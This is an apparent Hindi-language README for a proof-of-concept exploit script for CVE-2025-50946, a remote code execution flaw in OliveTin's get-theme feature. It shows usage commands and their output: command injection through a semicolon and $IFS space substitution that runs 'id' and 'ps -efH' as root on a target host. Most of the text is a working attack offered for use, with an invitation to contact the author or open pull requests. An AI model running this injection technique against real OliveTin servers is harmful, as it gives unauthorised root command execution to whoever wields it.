
CVE-2025-50946 के लिए एक्सप्लॉइट स्क्रिप्ट
CVE-2025-50946 (OliveTin get-theme RCE) के लिए शोषण स्क्रिप्ट। वर्ण आवश्यकताएँ पेचीदा हैं और कई कमांड जिनमें एकाधिक तर्क शामिल हैं, ठीक से निष्पादित नहीं हो सकते। मैंने मूल कारण का पता लगाने या स्क्रिप्ट को अधिक मजबूत बनाने का समय नहीं लिया है। यदि आपको कुछ चाहिए तो मुझसे संपर्क करें या PR खोलें।
chrisWalker11 को श्रेय जिस मूल शोध पर मैंने यह स्क्रिप्ट आधारित की है: लिंक
बुनियादी PoC:
python cve-2025-50946.py -t http://192.168.141.194 -p 1337 --command "id"
[*] Target: http://192.168.141.194:1337
[*] Payload: id
[*] Sending payload...
uid=0(root) gid=0(root) groups=0(root)
प्रक्रिया सूची (आउटपुट का केवल एक अंश दिखाते हुए):
python cve-2025-50946.py -t http://192.168.141.194 -p 1337 --command "ps -efH"
[*] Target: http://192.168.141.194:1337
[*] Payload: ps$IFS-efH
[*] Sending payload...
UID PID PPID C STIME TTY TIME CMD
root 2 0 0 09:20 ? 00:00:00 [kthreadd]
root 1 0 0 09:20 ? 00:00:01 /sbin/init
root 313 1 0 09:20 ? 00:00:00 /usr/lib/systemd/systemd-journald
root 738 1 0 09:20 ? 00:00:00 /usr/sbin/cron -f -P
root 749 1 0 09:20 ? 00:00:00 /usr/local/bin/OliveTin
root 2167 749 0 13:26 ? 00:00:00 sh -c olivetin-get-theme http://t;ps$IFS-efH
root 2168 2167 0 13:26 ? 00:00:00 ps -efH